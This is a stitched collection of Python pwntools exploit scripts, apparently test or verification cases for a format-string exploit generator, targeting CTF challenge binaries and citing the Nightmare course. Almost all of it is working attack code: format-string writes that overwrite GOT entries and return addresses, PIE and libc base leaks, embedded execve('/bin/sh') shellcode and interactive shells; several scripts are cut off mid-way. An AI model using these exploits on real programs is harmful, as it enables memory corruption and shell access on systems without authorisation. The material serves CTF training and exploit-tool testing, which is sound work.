import sf import sys import signal target = process("./chall-test_FmtString-13-x86") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvline().strip(b"\n"), 16) ret_address = leak + (108) fs = sf.WriteFmtStr(arch=32, value=-0x46, address=0x0, offset=0x4, printed_bytes=0x0, alignment_bytes=0x0, value_base=ret_address, address_base=ret_address) payload = sf.BufferOverflow(arch=32, start=108) payload.add_bytes(108, fs.generate_fmt_str()) payload.add_bytes( 70, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80" ) target.sendline(payload.generate_payload()) # Exploit Verification starts here 15935728
from pwn import * import os import sf import sys import signal target = process("./chall-test_FmtString-01-x64") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=64) fs = sf.WriteFmtStr(arch=64, value=0x401196, address=0x403398, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
import signal target = process("./chall-test_FmtString-17-x86") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Cancelled out and rendered obsolute: ") leak = int(target.recvline().strip(b"\n"), 16) pie_base = leak - (4684) bof_payload.add_base("pie", pie_base) fs = sf.WriteFmtStr( arch = 32, value = 0x124c, address = 0x3324, offset = 0x7, printed_bytes = 0x0, alignment_bytes = 0x1, value_base = pie_base, address_base = pie_base) payload = fs.generate_fmt_str() target.sendline(payload) fs = sf.WriteFmtStr( arch = 32, value = 0x10b0, address = 0x3330, offset = 0x7, printed_bytes = 0x0, alignment_bytes = 0x1, value_base = pie_base, address_base = pie_base)
import signal target = process("./chall-test_FmtString-11-x64", env={"LD_PRELOAD": "./libc-2.30.so"}) gdb.attach(target) bof_payload = sf.BufferOverflow(arch=64) target.recvuntil("It seems I've been buried alive: ") leak = int(target.recvuntil(b"\n").strip(b"\n"), 16) libc_base = leak - (413040) bof_payload.add_base("libc", libc_base) print("libcBase is: %s" % hex(libc_base)) fs = sf.WriteFmtStr(arch=64, value=0xe6b93, address=0x4033b8, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=libc_base, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import sf target = process("./chall-test_FmtString-14-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr( arch = 32, value = 0x80492a3, address = 0x804c010, offset = 0x6, printed_bytes = 0x0, alignment_bytes = 0x1, value_base = 0, address_base = 0) payload = fs.generate_fmt_str() target.sendline(payload) fs = sf.WriteFmtStr( arch = 32, value = 0x80490e0, address = 0x804c00c, offset = 0x6, printed_bytes = 0x0, alignment_bytes = 0x1, value_base = 0, address_base = 0)
leakPayload = b"" leakPayload += b"xxxxxxx" leakPayload += b"%3$x" leakPayload += b"yyyyyyy" target.sendline(leakPayload) leak = target.recvuntil(b"yyyyyyy") leak = leak.strip(b"yyyyyyy") leak = leak.split(b"xxxxxxx")[1] leak = int(leak, 0x10) pie_base = leak - 0x128f print("PieBase is: %s" % hex(pie_base)) fs = sf.WriteFmtStr(arch=32, value=0x124d, address=0x3314, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=pie_base, address_base=pie_base) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Slipknot | # +------------------------------------------------+ # | Song: (515) | # +------------------------------------------------+ # | *sid screaming | # +------------------------------------------------+
leakPayload = b"" leakPayload += b"xxxxxxx" leakPayload += b"%13$lx" leakPayload += b"yyyyyyy" target.sendline(leakPayload) leak = target.recvuntil(b"yyyyyyy") leak = leak.strip(b"yyyyyyy") leak = leak.split(b"xxxxxxx")[1] leak = int(leak, 0x10) libc_base = leak - 0xbf7e5 print("libcBase is: %s" % hex(libc_base)) fs = sf.WriteFmtStr(arch=64, value=0x554e0, address=0x403358, offset=0x8, printed_bytes=0x0, alignment_bytes=0x0, value_base=libc_base, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) target.sendline("/bin/sh\x00") # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out")
import os import sf import sys import signal target = process("./chall-test_angstrum16-format1") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=64) fs = sf.WriteFmtStr( arch = 64, value = 0x40074d, address = 0x601030, offset = 0x8, printed_bytes = 0x0, alignment_bytes = 0x0, value_base = 0, address_base = 0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
from pwn import * import sf target = process("./chall-test_FmtString-13-x64") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=64) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvuntil(b"\n").strip(b"\n"), 16) ret_address = leak + (152) fs = sf.WriteFmtStr(arch=64, value=-0x40, address=0x403390, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=ret_address, address_base=0) payload = sf.BufferOverflow(arch=64, start=152) payload.add_bytes(152, fs.generate_fmt_str()) payload.add_bytes( 64, b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05" ) target.sendline(payload.generate_payload()) target.interactive() # +------------------------------------------------+
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import sf target = process("./chall-test_ractf-nra") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr( arch = 32, value = 0x8049245, address = 0x804c018, offset = 0x4, printed_bytes = 0x0, alignment_bytes = 0x0, value_base = 0, address_base = 0) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Slipknot | # +------------------------------------------------+ # | Song: Spit it Out | # +------------------------------------------------+
# # For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import sf target = process("./chall-test_FmtString-03-x64") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr(arch=32, value=0x8049236, address=0x804b2f4, offset=0x8, printed_bytes=0x5, alignment_bytes=0x2, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Distrubed | # +------------------------------------------------+ # | Song: The Light | # +------------------------------------------------+ # | Sometimes darkness, | # | can show you, |
# # For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import sf target = process("./chall-test_FmtString-02-x64") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr(arch=32, value=0x8049216, address=0x804b2e4, offset=0xa, printed_bytes=0x10, alignment_bytes=0x0, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Five Finger Death Punch | # +------------------------------------------------+ # | Song: Coming Down | # +------------------------------------------------+ # | I'm | # | Coming Down |
from pwn import * import os import sf import sys import signal target = process("./chall-test_tamu17-pwn3") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr(arch=32, value=0x80485ab, address=0x804a01c, offset=0x4, printed_bytes=0x0, alignment_bytes=0x0, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
import sf target = process("./chall-test_FmtString-15-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Total Nightmare: ") leak = int(target.recvline().strip(b"\n"), 16) pie_base = leak - (4826) bof_payload.add_base("pie", pie_base) fs = sf.WriteFmtStr(arch=32, value=0x12da, address=0x33a4, offset=0x6, printed_bytes=0x0, alignment_bytes=0x1, value_base=pie_base, address_base=pie_base) payload = fs.generate_fmt_str() target.sendline(payload) fs = sf.WriteFmtStr(arch=32, value=0x10f0, address=0x33a0, offset=0x6, printed_bytes=0x0, alignment_bytes=0x1, value_base=pie_base, address_base=pie_base) payload = fs.generate_fmt_str() target.sendline(payload)
from pwn import * import sf target = process("./chall-test_FmtString-11-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvline().strip(b"\n"), 16) ret_address = leak + (532) fs = sf.WriteFmtStr(arch=32, value=0x80491f6, address=0x0, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=None, address_base=ret_address) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Distrubed | # +------------------------------------------------+ # | Song: The Sound of Silence | # +------------------------------------------------+ # | Hello Darkness, | # | my old friend |
from pwn import * import sf target = process("./chall-test_FmtString-20-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvline().strip(b"\n"), 16) ret_address = leak + (87) fs = sf.WriteFmtStr(arch=32, value=-0x31, address=0x804b2d8, offset=0x6, printed_bytes=0x0, alignment_bytes=0x3, value_base=ret_address, address_base=0) payload = sf.BufferOverflow(arch=32, start=87) payload.add_bytes(87, fs.generate_fmt_str()) payload.add_bytes( 49, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80" ) target.sendline(payload.generate_payload()) target.interactive() # +------------------------------------------------+
import os import sf import sys import signal target = process("./chall-test_redpwn19-rot26") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr( arch = 32, value = 0x8048737, address = 0x804a020, offset = 0x7, printed_bytes = 0x0, alignment_bytes = 0x0, value_base = 0, address_base = 0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import time import sf target = process("./Correction-FsGotShellcodeFsleak-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr( arch = 32, value = 0x804922b, address = 0x804b2b0, offset = 0x7, printed_bytes = 0x0, alignment_bytes = 0x0, value_base = 0, address_base = 0) payload = fs.generate_fmt_str() target.sendline(payload) leakPayload = b"" leakPayload += b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80" leakPayload += b"xxxxxxx" leakPayload += b"%134$x" leakPayload += b"yyyyyyy" target.sendline(leakPayload) leak = target.recvuntil(b"yyyyyyy") leak = leak.strip(b"yyyyyyy") leak = leak.split(b"xxxxxxx")[1]
from pwn import * import os import sf import sys import signal target = process("./chall-test_FmtString-16-x86") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr(arch=32, value=0x80491e6, address=0x804b310, offset=0x7, printed_bytes=0x0, alignment_bytes=0x3, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") signal.signal(signal.SIGALRM, handler) signal.alarm(2)
import sf from pwn import * target = remote("localhost", 30011) # target = process("./chall_11") # gdb.attach(target) target.sendline(b"00") target.recvline() fs = sf.WriteFmtStr( arch = 32, value = 0x80484e6, address = 0x8049918, offset = 0x6, printed_bytes = 0x0, alignment_bytes = 0x0, value_base = 0x0, address_base = 0x0) payload = fs.generate_fmt_str() target.sendline(payload) target.sendline(payload) target.interactive()
import sf target = process("./chall-test_FmtString-04-x64") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=64) target.recvuntil("We're dreaming: ") leak = int(target.recvuntil(b"\n").strip(b"\n"), 16) pie_base = leak - (4576) bof_payload.add_base("pie", pie_base) fs = sf.WriteFmtStr(arch=64, value=0x11c9, address=0x33d0, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=pie_base, address_base=pie_base) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Green Day | # +------------------------------------------------+ # | Song: Holiday | # +------------------------------------------------+ # | Hear the sound of the | # | falling rain |
# # For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import time import sf target = process("./Correction-FsGotShellcodeFsleak-x64") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=64) fs = sf.WriteFmtStr(arch=64, value=0x4011be, address=0x403388, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) leakPayload = b"" leakPayload += b"xxxxxxx" leakPayload += b"%70$lx" leakPayload += b"yyyyyyy" leakPayload += b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05" target.sendline(leakPayload) leak = target.recvuntil(b"yyyyyyy") leak = leak.strip(b"yyyyyyy") leak = leak.split(b"xxxxxxx")[1] leak = int(leak, 0x10)
leakPayload = b"" leakPayload += b"xxxxxxx" leakPayload += b"%2$x" leakPayload += b"yyyyyyy" target.sendline(leakPayload) leak = target.recvuntil(b"yyyyyyy") leak = leak.strip(b"yyyyyyy") leak = leak.split(b"xxxxxxx")[1] leak = int(leak, 0x10) libc_base = leak - 0x1e9580 print("libcBase is: %s" % hex(libc_base)) fs = sf.WriteFmtStr(arch=32, value=0x458b0, address=0x804b2a0, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=libc_base, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) target.sendline("/bin/sh\x00") # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out")
# # For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import sf target = process("./chall-test_backdoor17-bbpwn") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) fs = sf.WriteFmtStr(arch=32, value=0x804870b, address=0x804a028, offset=0xa, printed_bytes=0x46, alignment_bytes=0x0, value_base=0, address_base=0) payload = fs.generate_fmt_str() target.sendline(payload) target.interactive() # +------------------------------------------------+ # | Artist: Godsmack | # +------------------------------------------------+ # | Song: I Stand Alone | # +------------------------------------------------+ # | I've told you this, | # | once, |